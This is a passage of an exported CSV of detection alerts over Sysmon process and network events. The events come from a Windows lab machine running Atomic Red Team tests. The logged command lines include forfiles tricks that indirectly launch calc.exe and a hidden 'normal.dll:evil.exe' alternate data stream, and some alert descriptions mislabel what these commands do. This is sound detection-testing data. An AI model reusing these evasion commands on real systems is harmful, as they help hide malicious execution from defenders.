<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /user ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:07.994501Z"">
</TimeCreated>
<EventRecordID>4110</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:07.987</Data>
<Data Name=""ProcessGuid"">747F3D96-DD8B-5D31-0000-001094584A00</Data>
<Data Name=""ProcessId"">5792</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot;) in directory : ( c:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:09:59.931135Z"">
</TimeCreated>
<EventRecordID>4108</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:09:59.829</Data>
<Data Name=""ProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell</Data>
<Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD37-5D31-0000-00109D4C4900</Data>
<Data Name=""ParentProcessId"">5632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:09:59.931135Z"">
</TimeCreated>
<EventRecordID>4108</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:09:59.829</Data>
<Data Name=""ProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell</Data>
<Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD37-5D31-0000-00109D4C4900</Data>
<Data Name=""ParentProcessId"">5632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548999.931135,2019-07-19T19:09:59.931135+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:09:43.329083Z"">
</TimeCreated>
<EventRecordID>4107</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:09:43.301</Data>
<Data Name=""ProcessGuid"">747F3D96-DD37-5D31-0000-00109D4C4900</Data>
<Data Name=""ProcessId"">5632</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4B8-5D31-0000-0010A8CE0600</Data>
<Data Name=""ParentProcessId"">4416</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563548980.973075,2019-07-19T19:09:40.973075+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:58.359021Z"">
</TimeCreated>
<EventRecordID>4105</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3400"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-19 14:57:52.847</Data>
<Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ProcessId"">3912</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49734</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548278.359021,2019-07-19T18:57:58.359021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:55.236766Z"">
</TimeCreated>
<EventRecordID>4104</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:55.181</Data>
<Data Name=""ProcessGuid"">747F3D96-DA73-5D31-0000-001061933F00</Data>
<Data Name=""ProcessId"">1724</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548275.236766,2019-07-19T18:57:55.236766+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:55.138826Z"">
</TimeCreated>
<EventRecordID>4103</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:55.056</Data>
<Data Name=""ProcessGuid"">747F3D96-DA73-5D31-0000-0010918F3F00</Data>
<Data Name=""ProcessId"">4092</Data>
<Data Name=""Image"">C:\Windows\System32\forfiles.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">ForFiles - Executes a command on selected files</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA73-5D31-0000-00106A8D3F00</Data>
<Data Name=""ParentProcessId"">1052</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c &quot; c:\folder\normal.dll:evil.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548275.138826,2019-07-19T18:57:55.138826+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c &quot; c:\folder\normal.dll:evil.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:55.069079Z"">
</TimeCreated>
<EventRecordID>4102</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:55.024</Data>
<Data Name=""ProcessGuid"">747F3D96-DA73-5D31-0000-00106A8D3F00</Data>
<Data Name=""ProcessId"">1052</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c &quot; c:\folder\normal.dll:evil.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548274.165319,2019-07-19T18:57:54.165319+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:54.129841Z"">
</TimeCreated>
<EventRecordID>4100</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:54.123</Data>
<Data Name=""ProcessGuid"">747F3D96-DA72-5D31-0000-001056513F00</Data>
<Data Name=""ProcessId"">3680</Data>
<Data Name=""Image"">C:\Windows\System32\forfiles.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">ForFiles - Executes a command on selected files</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA72-5D31-0000-0010044F3F00</Data>
<Data Name=""ParentProcessId"">1300</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548274.129841,2019-07-19T18:57:54.129841+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:54.099318Z"">
</TimeCreated>
<EventRecordID>4099</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:54.080</Data>
<Data Name=""ProcessGuid"">747F3D96-DA72-5D31-0000-0010044F3F00</Data>
<Data Name=""ProcessId"">1300</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548274.099318,2019-07-19T18:57:54.099318+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:53.882434Z"">
</TimeCreated>
<EventRecordID>4098</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:53.815</Data>
<Data Name=""ProcessGuid"">747F3D96-DA71-5D31-0000-00101A463F00</Data>
<Data Name=""ProcessId"">6168</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
